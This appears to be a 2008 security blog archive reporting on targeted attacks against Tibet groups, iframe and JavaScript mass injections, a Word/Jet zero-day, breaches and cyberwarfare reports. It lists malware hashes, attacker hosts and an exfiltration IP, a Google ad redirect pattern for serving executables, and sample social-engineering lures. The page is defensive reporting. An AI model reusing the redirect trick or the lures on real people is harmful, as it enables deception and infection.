Maarten at the Internet Storm Center shows us another targeted attack. As usual, a social engineering part is involved and this time it's the protests in Tibet. He shows us the result of his ppt sample (reports_of_violence_in_tibet.ppt MD5 977a4ac91acf5d88044a68f828154155) submitted to virustotal and as we have seen before, it's not that good. Only five scanners out of 32 will detect it. F-Secure and McAfee did a similar analysis within the same context but with .chm files.

One of the possible new reasons why detection is deteriorating is the rise in use of custom packers. Sophos has an interesting article on it: Packer r(evolution).

Eddy from Wavci gives us some other details from this targeted attack (UPDATED):

The exploit silently runs a keylogger that collects and sends everything typed on the affected machine to a server running at xsz.8800.org. And 8800.org is a Chinese DNS-bouncer system that, while not rogue by itself, has been used in various targeted attacks. The vast majority of control servers were identified on Chinese netblocks. However, servers have been identified in the USA, South Korea and Taiwan. The host names pointing to these servers are often configured on dynamic DNS services such as 3322.org. While these services in themselves are not malicious, they are heavily used in these specific attacks.

According to Maarten, you should keep an eye out for the following files:

CHM Help files with embedded objects;
Acrobat Reader PDF exploits;
Microsoft Office exploits;
LHA files exploiting vulnerabilities in WinRAR;
Exploitation of an ActiveX component through an attached HTML file.

He also points to an article from Brian Krebs at the Washington Post.

According to a January article in Air Force Online, a series of e-mail attacks originating in China targeted 28 defense contractor locations in the United States late last year. The story named specific Beijing-based Internet addresses that the FBI later determined were the origin of the attacks.

Van Horenbeeck, who provides security and technical advice to several Tibetan groups, said he has uncovered evidence that those same numeric Internet addresses were used in targeted attacks against Students For a Free Tibet, another New York-based human rights group.

The attacks on pro-Tibet organizations are not the first to be tied to computers in China. The Washington Post reported March 21 that the FBI is investigating whether hackers in China targeted a group working for human rights in Darfur, the war-torn province of Sudan. China has economic and strategic interests in the African nation's oil fields.

Van Horenbeeck said the danger with the e-mail viruses involved in the attacks is that they are so hand-crafted and new that they usually go undetected by dozens of commercial anti-virus scanners on the market today.

"Last week, I had two of these samples that were detected by two out of 32 different anti-virus scanners, and another that was completely undetected," he said.

The specificity of information sought in the targeted attacks also suggests the attackers are searching for intelligence that might be useful or valuable to a group that wants to keep tabs on human rights groups, said Nathan Dorjee, a graduate student who provides technology support to Students for a Free Tibet. (Full article here.)

Especially this part was very interesting:

Dorjee said the attacks have been unsettling but ineffective, as the Students for a Free Tibet network mostly operates on more secure platforms, such as Apple computers and machines powered by open source operating systems.

"The fact that we're being attacked with the same resources thrown at multi-billion defense contractors is flattering," said Lhadon Tethong, executive director of Students for a Free Tibet. "It shows that we really are an effective thorn in the side of a repressive regime."

I wouldn't be overconfident about running on alternative OS'es. As Diniz Cruz told me once, you can get equally owned on Mac but at least you get owned in style. ;-)

See: Apple Patches 93 Security Holes and Anti-virus on a Mac? (Washington Post).

Now there seems to be yet another 0-day vulnerability in Word. Or should I say through Word. From McAfee Avertlabs:

In several recent-yet limited-attacks, exploits were crafted to attack an MS Jet Database vulnerability through Word. The Word docs are coded to reference Access database files regardless of extension (which allows attackers to circumvent content filters looking for specific email attachment extensions).

An attack scenario looks like this:

A user receives an email message with 2 attachments (one of which is a Word document)
The email client saves the attachments to the same directory
The user opens the Word document, which in turn opens the Access database containing the exploit code

Full article.

You can also find more information in the Microsoft Security Advisory (950627). Apparently, the guys at Microsoft are working during Easter weekend because of this.

Customers running Windows Server 2003 Service Pack 2, Windows Vista, and Windows Vista Service Pack 1 are not vulnerable to the buffer overrun being attacked, as they include a version of the Microsoft Jet Database Engine that is not vulnerable to this issue.

Customers using Microsoft Word 2000 Service Pack 3, Microsoft Word 2002 Service Pack 3, Microsoft Word 2003 Service Pack 2, Microsoft Word 2003 Service Pack 3, Microsoft Word 2007, and Microsoft Word 2007 Service Pack 1 on Microsoft Windows 2000, Windows XP, or Windows Server 2003 Service Pack 1 are vulnerable to these attacks.

In the last weeks, Zone-H released their statistics on web defacements and observed a large decrease for the first time in years. Now, this is not a good thing.

At that time and before, website defacement was mainly a Brazilian business where hundreds of Brazilian crackers groups were causing havoc to the web. They were all coordinating between each other using the most famous Brazilian IRC network, called Brasnet. One day in year 2005, the Brazilian police seized the logs of the conversations between the Brazilian defacers and started to distribute punishments to some of them. The reaction was quite immediate: most of the crews quit their own IRC Brasnet channels, some of them decided to quit defacing and some of them moved to different servers, trying to look for "secrecy" on private IRC servers.

Regardless, the path was already traced, defacing was maybe something funny to do for Brazilians but more interesting activities were profiling at the horizon, such scamming, phishing, carding and banking. From hacking for fun, soon the Brazilians efforts were targeted to hacking for money. So much that today, there is no more activity in regards of defacements coming from Brazil. Sure, the Turks inherited the defacing business from Brazilians, nowadays most of the website defaces are coming from the land of Ata Turk.

As I said in my last presentation, hacking for fun is fading out. It's all for the money now. So be safe and know your risks.

Previous posts:

Saturday

My blog's First Anniversary

I realized today that I have been blogging just over a year now. I started just after becoming a security consultant. It has been a blast. I went to a lot of conferences. I met a lot of interesting people, also in the digital world. I joined the Security Catalyst Community. I became a CISSP and CISA member. etc...
It all started with this first entry. Although reading all those rss feeds of mine takes a lot of time, I'm not giving up yet. I hope some people enjoyed the information I keep track of. I will be trying to add some tutorials of my own in the next year. Although, it might have to wait until I finish my postgraduate at Solvay Business School.

Anyway, up to the second year!!!!

The source code of the Javascript injection attack of last week

The Hacker webzine posted the source code of the fuckjp.js script used in the attacks of the last weeks. The JS malware exploits vulnerabilities in Windows, RealPlayer, and other applications and is heavily obfuscated. The bad guys have it, so why can't we all dissect it and learn about it. Here is a snippet:

Looking at presentations

Today was my second presentation, well, on presentation (techniques). After reading presentationzen, I have been trying to train my creative side and go for an innovative approach. It was very well received by my colleagues. Since there is so much to tell about presentations, I split it up into several sessions (today was nr. 1). I have been roaming slideshare.net looking for presentations that I like so I could compare them to my own. My presentations were not that technical until now. Since my colleagues sometimes have to give quite technical presentations, I was looking for an example to keeps the "zen" approach and still provide a lot of information. This one is as close as I could find:

| View | Upload your own

The following were other presentations that I liked. I would change some things here and there but overall not bad. Some are quite different in design:

For more examples, visit my slideshare favorites page. You could also have a look at the following videos. It not only show slides, but how someone presents them. These are absolutely my two favorites:

Friday

Podcast: AudioParasitics Episode 31: Highlights of McAfee's recent 'Sage 3' report

The latest AudioParasitics is out:

Episode 31 - Dave and Jim discuss the highlights of McAfee's recent 'Sage 3' report. In Sage 3, Avert Labs examines global malware trends. The report is based on data compiled by McAfee's international experts and examines the globalization of threats and the unique threats in different countries and regions.

And I totally missed out on the previous episodes:

Episode 30 - Microsoft Patch Tuesday Special Edition - MS08-014 - MS08-017 are discussed. Craig Schmugar joins Jim and Dave to discuss the security implications of each bulletin.

Episode 29:	Part 2 of 2 - Dave and Jim are joined by George Heron (Chief Scientist at McAfee). In this series, we discuss intellectual property (patents), the current state of Mac security, and our old favorite - virtualization!
Episode 28:	Microsoft Patch Tuesday Special Edition - MS08-008, MS08-009, MS08-110 and others are discussed. Craig Schmugar joins Jim to discuss the security implications of each bulletin.
Episode 27:	Part 1 of 2 - Dave and Jim are joined by George Heron (Chief Scientist at McAfee). In this series, we discuss intellectual property (patents), the current state of Mac security, and our old favorite - virtualization!

Security.nl, Maarten, social engineering and targeted attacks

Security.nl did a 2-part article interviewing Maarten van Hoorenbeeck. It's in Dutch but you could try Babelfish or Google Translate. Maarten is an expert in targeted attacks and I have enjoyed his various blog articles on the subject. Not forgetting his excellent presentation on 24C3: Crouching Powerpoint, Hidden Trojan. He mentions a lot of points that we discussed before:

social engineering has become an important part of attacks
myspace, linkedin etc.... are providing social engineering material
targeted attacks are definitely on the rise
executive management is becoming a favorite target (spearphising)
0-day exploits are being used, especially in office documents (doc, ppt, xls etc)
Antivirus detection in these cases is very poor

Reading the two articles is highly recommended:

BONUS: Spearphishing is back (SANS ISC)

Thursday

Social engineering pentesting against your employees (UPDATED)

One of the main points during my presentation at the security conference was that social engineering has become an important part of phishing or targeted attacks. You can patch your systems against vulnerabilities but you cannot patch your employees. (that would be a nice feature).
Results of user awareness sessions may not be perfect all the time. But what about pentesting as user awareness sessions? We do pentests against the infrastructure but why don't we do it against the people? Not just to enhance normal pentests. Employees are as much part of the security process then the infrastructure. Some food for thought.
Anyway, here is a very interesting article from Lenny Zeltser: How to integrate social engineering into an information security assessment.

Research and design a scenario

You can get creative with scenarios that help achieve your goals, whether performing the test via email, phone, postal mail, instant messenger or in person. You will need to research the organization if you do not already understand its business, jargon, corporate hierarchy and social structure.

Next, you will need to think like an attacker, exploiting people's psychological inclinations such as:

People want something for nothing: "You won the office raffle! Click here to claim your gift."
People empathize with those in trouble: "Please reset my password. My boss will kill me if I don't submit the time sheet in time!"
People reciprocate a favor: You picked up the papers the person dropped; he holds the door to let you in.

Your scenario should specify the individuals or groups designated for social engineering, timing of the test, location, and persuasion tactics. Account for laws, contractual commitments, policies, and the company's culture. Also consider the possibility of something going wrong, and define back-out and escalation procedures.

Read full article. Note to self, I must bump up "The Art of Deception: Controlling the Human Element of Security" on my reading list.

Previous articles:

UPDATED: Johnny Long from ihackstuff.com has released a book: No Tech Hacking: A Guide to Social Engineering, Dumpster Diving, and Shoulder Surfing (Amazon.com)

My Desktop Security Presentation

I didn't have much time to blog in the last couple of days. I got the opportunity to give a presentation at a local security conference. They were looking for someone to talk about desktop security. This was a perfect opportunity to set my newfound knowledge on presentation skills into practice. I didn't have any experience as a speaker so this was a nice first experience. The slides are quite graphical and you need me to complete the story. I got some positive feedback from the audience afterwards. I hope you like them as much and feel free to give some comments. Practice makes perfect and a journey of a thousand miles starts with one step. Here it is:

| View | Upload your own

PS: I gave a demonstration of the winlockpwn tool using firewire and the crowd went wild.

Wednesday

The Hannaford (Delhaize) Breach, a new TJX case?

You couldn't have missed the news today on the Hannaford breach. While not as massive as the TJX case, it's still a notable breach. Hannaford doesn't ring a lot of bells in Belgium but they are part of the Delhaize group which is well known over here. One of the most interesting articles today was from Securosis: Picking Apart The Hannaford Breach- What Might Have Happened

According to multiple sources, the Hannaford Brothers grocery chain suffered a major breach FAQ for their customers. Odds are it will be months until we find out what really happened, but I’m going to speculate anyway, pick apart the press coverage and FAQ, and see if we can learn something from this now. with 4.2 million credit cards exposed. Hannaford had published an

As usual, the information released is incomplete and contradictory.

Google ads used to distribute malware

My fellow Belgian blogger Didier Stevens did a proof of concept last year in which he used Google ads in a little security experiment. It seems that malware writers really have started to use this as an infection method.

From McAfee Avertlabs:

One can even point the Google page ad to executable files (malware authors have started doing this), and the link will redirect and download the malware just fine. It’s kind of ironic given than Google is very strict about the kind of file attachments one can upload/download via their Gmail service.

http://www.google.com/pagead/iclk?…adurl=http://download.nai.com/…/win_xdatbeta.exe

The preceding example downloads a McAfee signature file in executable format.

Let's hope that Google will fix this problem asap.

Monday

USENIX security conference presentations are online

From USENIX:

The online proceedings are now available to USENIX members. The Best Papers are available and free to everyone. Also, check out the latest media coverage of USENIX Security '07.

Some examples:

Full listing here.

Saturday

Do we need user education?

The post "Don’t Need No Education">We ~~Don’t~~ Need No Education" from Securosis caught my eye. The discussion about User Education started after some articles from Rational Survivability: McGovern's "Ten Mistakes That CIOs Consistently Make That Weaken Enterprise Security" and Why Security Awareness Campaigns Matter. Additionally, the comments on the posts are interesting to follow.

From Securosis:

In an enterprise environment, user security training is not:

1. Telling users not to open emails from people they’ve never heard of
2. Telling users not to click on random links on web pages
3. Telling users to patch their own systems

Trying to make users change the way they interact with their tools is very challenging, and the very nature of viruses, phishing, and the like make it very challenging for users to correctly discern the difference between legitimate and hazardous emails and websites. So these are ideal problems for solving with technology. Awareness of the threats, however, is directly useful for users, as they are often the first people to notice issues and notify the helpdesk.

Good security training focuses on broader problems that don’t lend themselves to pure technology solutions. Training can be broken down into two major categories, General and Group-Specific. General security training is appropriate for all employees regardless of their job role. Group-Specific security training focuses on particular skills that are relevant to only a portion of the company.

Examples of General Security Training include:

1. Education on policies and procedures
2. Fire/Tornado Drills
3. What to do in an emergency, e.g., how to get 911 (or equivalent); how to contact on-site security
4. Locations of First Aid kits
5. Who to contact if you believe you have identified a security threat or risk
6. “If you see something, say something”
7. Not faxing/emailing organizational charts, phone lists, or other protected corporate information offsite
8. Rules for how to handle confidential information
9. Travel safety tip

Read the full post. Personally, I have always been an advocate of user education. Now finding the perfect formula, that's work in progress.

UPDATE (18/03/2007): Five Mistakes IT Groups Make When Training End-Users (CIO.com)

Video on harddisk encryption cold boot attack

Last month, a paper from Princeton University showed us how harddisk encryption was circumvented. Here is the demo video:

Attack of the Killer iframes and the javascript infections

At the beginning of the week, we saw an uprise in iframe attacks. Now at the end of the week, it's time to review the entire story. It's hard to have missed all the different blogs and securitycenters reporting on it. Among the better known website, Trendmicro joined the ranks of the victims.

1. The first iframe attacks lead to new site which enticed the used to install a new codec. A video provided by Avertlabs shows what an enduser would see.

March 2008 - Mass Hack Demo from Schmooog on Vimeo.
--

Scanner results : 22% Scanner(8/36) found malware!

File Name : democodec1292.exe

File Size : 74823 byte
MD5 :30965fdbd893990dd24abda2285d9edc
SHA1 : 53eacbb9cdf42394bd455d9bd2275f05730332f7

Downloader.Zlob.ZV; Trojan-Downloader.Win32.Zlob.eie; TrojanDownloader.Zlob.epx

As you can see, initial AV detection was not really good. But these needed user interaction to execute the code.

2. Another wave of MASSIVE webbased infection started this week as a javascript was injected into websites and led visitors to a malicious website hosted on 2117966.net. For this one, user interaction was not needed and the site tries to exploit several vulnerabilities.

Two days ago, The Register talked of almost 23.000 infections. Just doing a google search for "script src http www.2117966.net fuckjp.js" reveals it's about 24.500 now. I advise you not to click through to those sites.

The malicious websites attempt to exploit the vulnerability described in MS06-014 MS07-004, MS06-067, MS06-057 and a number of ActiveX vulnerabilities:

Baofeng Storm ActiveX

Ourgame GLChat ActiveX

Microsoft Internet Explorer VML (VU#122084)

Qvod Player ActiveX

Microsoft RDS.Dataspace ActiveX (VU#234812)

RealPlayer playlist ActiveX (VU#871673)

Storm Player ActiveX

Microsoft Windows WebViewFolderIcon ActiveX (VU#753044)

Xunlei Thunder DapPlayer ActiveX

Shadowserver.org has some more information about how the Trojan works:

The trojan does not appear to do anything at all and makes no outbound connections if your machine is idle. However, if Internet Explorer is launched and makes a POST request involving an password field, the the trojan will spring into action sending encrypted traffic to another server in China. The trojan appears to specifically look for password input tags (< type="password ">). It does not appear to send off POST data unless there is a password input tag. If it detects a qualifying POST request it will immediately begin sending encrypted traffic to a Chinese server at 61.188.39.175 on port 2034. It does not appear to be using DNS to find this IP address.

Malware Binary:

File MD5: dca9063dd1f1f5dfc4c313f0136114c2
File Size: 69632 bytes

Malware DLL:

File MD5: d24d9c46a79ba36d742a1f0b61ed9cc8
File Size: 45056 bytes

So you may have noticed that it pointed to a server in China. Hmmmm...... also the name of the script was fuckjp.js and we can guess what JP stand for. When looking for some information on the script, I found this piece through TheDarkVisitor from the K'LLER blog :

After Analyzing the script I remembered that these kind of scripts are created by using some Web attckers toolkit like MPack, FirePack, IcePack , WPack or AnnyPack in which just you have to feed some info like payload and place it to compromised webserver or newone. But in this case the it is VIP 2.74 from Chinese Hackers. Latest Version is 2.842.

No matter who the wielder and what the origin of this malware is, take the necessary steps to protect yourself. So make sure you install all your patches and try to avoid the use of ActiveX or Java or use some mitigating factors such as KillBits or Noscript. Corporate networks might want to block traffic to www.21179 66.net.

Some previous articles:

SecurityDistro.com 2.0

Josh from SecurityDistro left me a message saying that they re-launched the site which allows for user generated security content now. The goal is to lower the cost of training for people who need security knowledge by leveraging users willingness to contribute content. I want to invite you to check out the new site and help contribute to the initiative.

Here is the featured Security Distro list to see the full list [click here]

Feature Video:
Running an ISO on VMware

Friday

Nigerian scam statistics in Belgium

Ultrascan, is an investigation group that keeps worldwide statictics of 419 Advance Fee Fraud.
This type of scams are named after a Nigerian law article and are best known for the various social engineering tricks by which victims are lured into giving sums of money. The scam artists who are often based in Nigeria, contact their victims by spam, letters but also chatrooms, game forums and social networks.

In February, Ultrascan released their latest report: February 19 2008 version 1.7

When looking at the statistics , it seems the cases of 419-scams are only increasing. In Belgium, the number of active networks doubled to 14 in the last year. The scam artists managed to steal 25 billion euro from the 69 countries where the group keeps statistics.

The report mentions the dutch Project Apollo and was a good example of a police force that efficiently tackled 419-crime. They raided internet cafes in Amsterdam where Nigerians where conducting their 'business'. Their success is possibly one of the reasons why the cases in Belgium increased.

These statistics are only based on the information Ultrascan collected and are of course not the complete picture but it gives an idea.

419 AFF is no cyber crime. It is a mainly a confidence fraud using all
communication resources available.

Misunderstandings on 419 AFF:

Most check and lottery fraud are Nigerian 419 AFF.

1. Lottery fraud (95% Nigerian advance fee scammers)
2. Check fraud (76% Nigerian advance fee scammers)
3. 419 advance fee fraud (97% Nigerian advance fee scammers)
4. Phishing. (5% Nigerian advance fee scammers

Read the report here.

See also the "The little black book of scams" from the Australian Competition and Consumer Commission (ACCC) .

Bonus: BEVEILIGING VAN DIGITALE INFORMATIE (Comité van de Academie voor Wetenschappen en Techniek) -- 26 oktober 2007

This report describes the key issues related to the security of information as they are surfacing in our contemporary society. First it is argued that the realm of the protection, confidentiality, authenticity and integrity of information is more than ever an important item of concern. The wide access to information, the wide availability of ICT systems and their enormous applications, the fast transmission of data and information, and the ever increasing number of users worldwide, justify the attention of the entire network and society as a whole. The role of the different stakeholders, the government, the companies, the ICT service providers and the society and its citizens are situated within this framework. The juridical aspects constitute an important component. Many diverse application domains are specifically highlighted. Finally, actual and relevant technological methods are surveyed. The security of an information system is, like the strength of a chain, determined by the strength of its weakest link.

Bonus: Hoorzitting Internetveiligheid Parlement

Hoorzitting Parlement - Get more free documents

The academy: online security instruction videos

The concept of this website is to support the security community with video based instruction on how to install, configure and troubleshoot some of today's most popular security technologies.

Videos available:

Check Point
Cisco
Nokia
FortiGate
TippingPoint
OSSEC
IronPort
Nessus
Nmap
SANS Institute

Visit the site here.

Thursday

Pecha Kucha Brussels Vol. 03

After Volume 2, next week there will be a third edition. The presentations are not all technology related but Pecha Kucha is another form of giving presentations which can improve your creativity and presentation skills.

Spread the word. Share the world.
Pecha Kucha Brussels Vol. 03 calling.

Pecha Kucha, which is Japanese for the sound of conversation, is a series of show-and-tell evenings for designers, architects, artists and creatives, started by Klein Dytham architecture in Tokyo in 2003.

20 images x 20 seconds each.

Launched and organised by Alok Nandi, Architempo, as part of {creativity*conversation}, it attracts a wide audience.

Do register via http://pechakucha.architempo.net
Enjoy the presentations and the conversations.
Catering & bar on site

Speakers planned on March 20, 2008, are
_ Alexandra Deschamps-Sonsino, designswarm, tinker.it, London
_ Satinder Gill, Gesture and Multi-Modal Communication, UK
_ Luc Hoebeke retired and still searching, with
...Nirmala Isabelle Hoebeke, master in graphic arts
_ Francois Jegou, Sustainable Everyday Project, SDS
_ Maja Kuzmanovic, fo.am, media art & design
_ Arne Quinze, Quinze & Milan
_ Paolo Sacchettini - Torsen & car testing on frozen lakes
_ Sanjeev Shankar, architect/designer, street vending
_ Rob Van Kranenburg, RFID and cultural operator
_ Philippe Vandenbroeck, shiftn, scenario, photography
_ Olu Vandenbussche, design for the visually challenged
_ Danny Venlet, designer

Updates will be on http://pechakucha.architempo.net
See you there.
Pecha K_cha !
Best,

Alok NANDI

Collection of information on Cyberwarfare and the recent targeted attacks (updated)

Several interesting articles and papers have appeared in the last week, all concerning cyberwarfare capabilities and intrusions on the internet. Let's have a closer look at them.

First, I was reading 'The new art of War' (Washington Post). The following section caught my eye:

The Joint Information Operations Warfare Command, located at Lackland Air Force Base in Texas, integrates elements of electronic warfare, military deception, operations security and strategic communications to ensure that cyberspace is controlled and available to friendly forces for offensive and defensive uses.

I know that there are a lot of pointing fingers at China and that the media can also be used as a tactic. The truth probably is, that 'electronic warfare' is performed by both sides. But let's have a look at the information that is out there.

At the beginning of this week, the Pentagon released their Report to Congress about the Military Power of China '08. It was interesting to read the 66-page report where the Pentagon outlines various techniques China employs in order to boost its use of technology .

But the thing we are interested in, is the section on electronic capabilities:

"Cyberwarfare Capabilities. In the past year, numerous computer networks around the world, including those owned by the U.S. Government, were subject to intrusions that appear to have originated within the PRC. These intrusions require many of the skills and capabilities that would also be required for computer network attack. Although it is unclear if these intrusions were conducted by, or with the endorsement of, the PLA or other elements of the PRC government, developing capabilities for cyberwarfare is consistent with authoritative PLA writings on this subject.

• In 2007, the Department of Defense, other U.S. Government agencies and departments, and defense-related think tanks and contractors experienced multiple computer network intrusions, many of which appeared to originate in the PRC.

Note the last part mentions "appeared to originate in the PRC" (People's Republic of China).

Now, let's have an another view on this: Chinese Perceptions of Traditional and Nontraditional Security Threats (pdf from strategicstudiesinstitute.army.mil)

That the report is written at all is seen as evidence of American’s adherence to outdated and dangerous Cold War thinking, trying to paint China as the strategic rival that the Soviet Union once was. Major General Peng Guangqian of the Chinese People’s Liberation Army’s (PLA) Academy of Military Sciences noted that there have been only two instances where a government has publicly published reports on the military power of another country: the U.S. reports on the military strength of the former Soviet Union, and the current reports to Congress on China’s military strength. He continues, “Cooking up this kind of report on the military power of the so-called major opponent or potentially major ‘challenger’ of the future reflects typical Cold War thinking.”
While the report is no different from a standard intelligence assessment on foreign capabilities that most countries produce, its unclassified nature and broad distribution does make it unique. And the fact that the United States does not publish such assessments on any country besides China is telling about our own threat perceptions.

Commenting on the Pentagon’s “Cold War mentality” and continued propagation of the “China threat theory,” China’s Foreign Ministry spokesman noted that China was “strongly resentful and firmly opposed” to the report.

But let's get back to the hacking attempts that were reported last year and the tactics that were used. These attempts were not limited to the U.S., but included incidents in Germany, France and Britain.

If you had a look at the German intrusion, you could see that the attackers used Word documents to install Trojans in the network. If we have a look at the attacks on the Pentagon systems, the same tactic was used. That allowed attackers to send spoofed emails that appeared to come from other Pentagon personnel. After this, they managed to steal login credentials for the network, according to this article from Federal Computer Week.

Seems that social engineering is always an important part of the attack, combined with office documents containing exploits. This is consistent with tactics described by hackers like 'Wicked Rose':

Rose’s preferred method of attack is through social engineering and he says he has plenty of experience at it. First you get the sensitive information off the organization or institute’s public website. This period is called the collection stage. He notes that all the large companies maintain employee databases and that these contain the userids, passwords and mailboxes. Using the user’s identification you can search on the internet to find out where they go and what they do. It is important to do analysis on the userids of the major figures. It is possible to obtain their login and password at other sites they visit.
According to Rose, mailboxes are the most useful. You can get thousands of mailbox addresses from one database. Next, simply send out thousands of emails with Trojans attached and one or more of the employees is going to open it. (Source: The Dark Visitor).

The NCPH hacker group of which Wicked Rose is the leader, is known to have written several Word based exploit tools.

Yesterday, CNN.com also published an article on the hacker Xiao Chen. Note that there is also a video on top of the article.

But Xiao Chen says after the alleged Pentagon attack, his colleagues were paid by the Chinese government. Again, CNN has no way to independently confirm if that is true.
His allegations brought strenuous denials from Beijing. "I am telling you honestly, the Chinese government does not do such a thing," Qin said.
But if Xiao Chen is telling the truth, it appears his colleagues launched a freelance attack -- not initiated by Beijing, but paid for after the fact. "These hacker groups in my opinion are not agents of the Chinese state," says James Mulvenon from the Center for Intelligence Research and Analysis, which works with the U.S. intelligence community.

The Dark Visitor analyzed the video and found out the organization to which Xiao Chen belongs.

Next, I stumbled upon "Operational analysis of Chinese 'cyber army' penetration and recovery techniques" (spaces.icgpartners.com) dated 8 January 2008.
A wealth of information is gathered here, including the analysis of the following presentation on slideshare:

UPDATE: Some days after this post, the slides were removed. You can still download the screenshots here. And some of them are also displayed at TheDarkVisitor here (not completely though). The original poster on slideshare is unknown as are his reasons to remove it now.

From the article:

The PowerPoint China Cyber Army documents a classic, highly organized Chinese IP attack/phishing pattern that we have seen previously but China Cyber Army is the first specific unclass description that we've seen on the recent spate of Chinese attacks against France (also here), UK (also here), Germany, the US, but to name a few.

A Taiwanese-American working in the US IT sector who graduated the same year in Taiwan as did the likely author, Chung-Ping Chen, or Charlie Chen, now at National Taiwan University, and has a number of Stanford and Taiwanese friends coming from the same class as Chen had this to say about the PPT: "Those are interesting slides, and probably a known secret for a lot of Taiwanese." These foils (slides) will come as bracing news to too many complacent US and EU corporations and defense entities who believe that they are not at risk at their desk on home soil.

This site has another fascinating article from 31 May 2007: Informationalization in Chinese military doctrine affects foreign commercial and military assets.

In the absence of a US counter-cyber warfare strategy, Chinese IT technologists enter all but the most secure US systems, exceeding the limits of passive examination and surveillance. Naval Network Warfare Command (Netwarcom) and others observe:

Chinese attacks "far outstrip other attackers in terms of volume, proficiency and sophistication, [the conflict having] reached the level of a campaign-style, force-on-force engagement"

"Motives of Chinese hackers run the gamut, including technology theft, intelligence gathering, exfiltration, research on DOD operations and the creation of dormant presences in DOD networks for future action"

Chinese employ complex, parallel attacks including using a virus plant "as a distraction and then come in "slow and low" to hide in a system while the monitors are distracted… spear phishing, sending deceptive mass e-mail messages to lure DOD users into clicking on a malicious URL, [and innovative implementations] of more traditional hacking methods, such as Trojan horse viruses and worms"

Attacks are so deliberate, "it’s hard to believe it’s not [Chinese] government-driven"

It's really worth reading. They also take a look back at the 2007, 2006 and 2005 version of Military Power of the People’s Republic of China. But take these reports from the Pentagon with a grain of salt. It's only one point of view on the whole story.

I believe there is a real threat. It doesn't matter who is behind it. What matters is that they are organized and committed to their task. Understanding their mindset and tactics is important and often overlooked.

If you are still thirsty for more information, have a look at the Dark Visitor Blog. He has a wealth of information about the World of Chinese Hackers. He also has a book which I intend to buy this week. Taosecurity already has a review of the book here.

UPDATE(13/03/2008): The Heritage Foundation also has an extensive article that dates from 8 Feb 2008: Trojan Dragon: China's Cyber Threat. An excerpt:

According to an official of Taiwan's Ministry of National Defense, in 2006, Taiwan detected 13 PLA zero-day attacks launched within Microsoft applications and experienced a total of 178 days of vulnerability between notifying Microsoft of the attacks and receiving the appropriate patches. One PowerPoint-based attack was so sophisticated that it took Microsoft engineers over two months to construct a patch.[28] In spring 2006, a certain foreign "coast guard agency" discovered a covert program imbedded in its network that systematically searched for shipping schedules and then forwarded them to an e-mail address in China.[29]

Tuesday

More high profile sites getting iframe injections

After CNET, other high profile sites like Wired.com are getting iframe injections. And our friends of the RBN seems to be involved (again). Another excellent analysis by Dancho Danchev:

Key summary points :

- the same malicious parties behind the CNET and TorrentReactor's IFRAME injection are also the ones behind Wired.com and History.com's abuse of input validation
- the IFRAME injection entirely relies on the lack of input validation within their search engines, making executable code possible to submit and thereforeautomatically execute upon accessing the cached page with a popular search query
- many other domains have been introduced within the IFRAMEs, a complete list of which you can find in this post, several directly hosted within RBN's network
- the main domain serving the heavily obfuscated VBS malware is located within the Russian Business Network's known netblocks
- given the high page ranks of the current and the previous targets, it is evident that the malicious parties are prioritizing based on the possibility to abuse input validation on high page rank-ed sites, presumably in an automated fashion
- Keep it Simple Stupid works, as since they cannot find a way to embedd the IFRAME at these hosts, a clear indicating of the fact that they've breached them, they figured out a way to inject the IFRAMEs and again take advantage of the high page ranks to attract traffic by gaining on popular key words, or any kind of key words that they want to

Read Full article .

Monday

Speeding up DNS tunneling (updated)

An interesting article from Cyberphobia: Speeding up DNS tunneling.

Yes, DNS tunneling with OzymanDNS is slow (as described in my previous posting). Let’s try to speed it up a little bit.

If you have a closer look at the code, you’ll notice that the upstream is implemented by sending the data base32 encoded in long A DNS requests in chunks of 110 bytes (domain names may be up to 256 characters long, with dots at least every 64 characters). Due to base32 encoding and the required dots we can’t gain much here. Thankfully, in most cases we don’t need much upstream anyway.

Full article here.

UPDATE (10/03/2008): His code is now online: DNS Tunneling - Updated Source

Sunday

Podcast: Hak.5 Episode 3x08 -- Shmoocon Special

Hak5 released their Shmoocon Special. This special lasts 1h26m. Perfect for my train ride to work tomorrow.

In this episode we head to Washington DC for Shmoocon, the only security conference with foam projectiles. We converse with Renderman about hacking and con-going. Scott Moulton provides insight on recovery and forensics with solid state disks. Mati Aharoni aka Muts tells us all about Backtrack and offensive-security. Dan Griffin debuts some new security tools for Vista. David Hulton aka H1kari talks about his research intercepting and cracking GSM traffic. And Chris Compton & Co bring us the latest from Hack or Halo.

Download episode

Saturday

Invasion of the (belgian) iPhone users

So the iPhone SDK got presented to the world. As I guessed, Apple has now announced a lot of new features aimed at enterprises:

push mail
push contacts
push calendar
global address list
cisco vpn ipsec
certificates and identities
WPA2 / 802.1X
enforced security policies
device configuration tools
remote wipe

So it's aiming at Blackberry and might more easily find enterprise adaptation now. I saw an article mentioning that the iPhone will come to Belgium in May. It will be a simlock free version but one with a higher price. But it will work with all three mobile operators. Nevertheless, we have already seen people in Belgium carrying jailbroken iPhones. So they have been among us for some months now. I think CIOs need to consider these people as probably some want to sync their phone with their emails and contacts. Especially those VIP users. Just saying no, will probably lead to individuals trying the circumvent security controls. Like forwarding all their mails to a public account which they can sync with their iPhone.

Last juicy detail, Apple licensed the ActiveSync protocol (from Microsoft). This will enable Apple to build support for Microsoft Exchange directly into the iPhone.

I haven't seen any mention of data encryption. So I'll have a look at that possibility in the next days. One thing is sure, keep an eye out for those gadget loving people with an iPhone in your corporation. The countdown has started.

Friday

CNET Sites Under IFRAME Attack

Ddanchev has a very good analysis of the IFRAME injection attack on several CNET sites. It shows you that you don't have to surf on the dark side of the web to get infected. Banners, SEO poisoning and IFRAME injections are successful way to infect unpatched users.

With the recent IFRAME injection attack targeting ZDNet Asia, by abusing the site's search engine caching capabilities in a combination with the lack of input sanitization, several more CNET Networks' web properties besides ZDNet Asia, namely, TV.com, News.com and MySimon.com are currently getting targeted using the same technique to inject the IFRAMEs and have the sites cache and locally host the
results. The following assessement outlines the IPs and domains used in the IFRAMEs, the domains and IPs hosting the rogue anti-virus and anti-spyware applications, as well as the detection rates of the
applications.

Full analysis here.

Java patches out and MS Office patches on the horizon

As it could have been expected, Microsoft has issued Security Bulletin Advance Notification indicating that its March release cycle will contain four bulletins. All of them will have the severity rating of Critical. The notification states that these Critical bulletins are for Microsoft Office and Office Web components. The release is scheduled for Tuesday, March 11, 2008.

Additionally, Sun has released security updates for Java SE. These updates address multiple vulnerabilities in Java Web Start, Java JDK, Java JRE, and Java SDK. These vulnerabilities may allow a remote attacker to execute arbitrary code, bypass security restrictions, or cause a denial-of-service condition. Don't forget that installing the new version won't uninstall the old one. You have to deinstall it yourself.

